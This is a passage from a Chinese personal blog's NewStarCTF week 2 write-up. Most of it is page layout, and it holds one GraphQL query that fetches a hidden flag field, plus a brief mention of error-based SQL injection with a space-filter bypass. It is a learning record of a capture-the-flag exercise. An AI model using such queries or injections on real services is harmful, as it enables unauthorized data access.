<p>&amp;data&#x3D; <code>&#123;&quot;query&quot;:&quot;query&#123;\nffffllllaaagggg_1n_h3r3_flag &#123;\nflag\n&#125;\n&#125;\n&quot;, &quot;variables&quot;:null&#125;</code></p>
<p>这样就获得了flag</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221029172530817.png" class>
</div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/";
            const title         = "「NewStarCTFweek2」";
            const excerpt       = `#NewStarCTFweek2学习记录##Word-For-You(2 Gen)###解题

与week1一样，是sql注入类型。
使用报错注入。首先爆库。
我先使用了之前用过的报错注入语句，其中利用’()’来绕过空格（这个没必要，...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    
                </div>
                <div class="pull-date">
                    <time datetime="2022-10-29T09:44:51.232Z" itemprop="dateModified">最后编辑：2022-10-29</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" NewStarCTFweek1" href="/2022/10/18/NewStarCTFweek1/">&lt; 上一篇</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" NewStarCTFweek3" href="/2022/10/30/NewStarCTFweek3/">下一篇 &gt;</a>
            </div>
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.webp" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center">还在学习中，请多指教。</p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                7
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                0
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                0
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                

            
                
            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2022/11/03/BabySSTI-Two/"><i class="fa  fa-book"></i> BabySSTI_Two</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/10/30/NewStarCTFweek3/"><i class="fa  fa-book"></i> NewStarCTFweek3</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/10/23/NewStarCTFweek2/"><i class="fa  fa-book"></i> NewStarCTFweek2</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/10/18/NewStarCTFweek1/"><i class="fa  fa-book"></i> NewStarCTFweek1</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/10/17/RCE1/"><i class="fa  fa-book"></i> RCE(NewStarCTF week4)</a>
            
          
        
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/CandyUnion"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https://nya.one/@Candinya"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/Candinya"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2022 无终的博客 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by 无终.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="2976970524"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>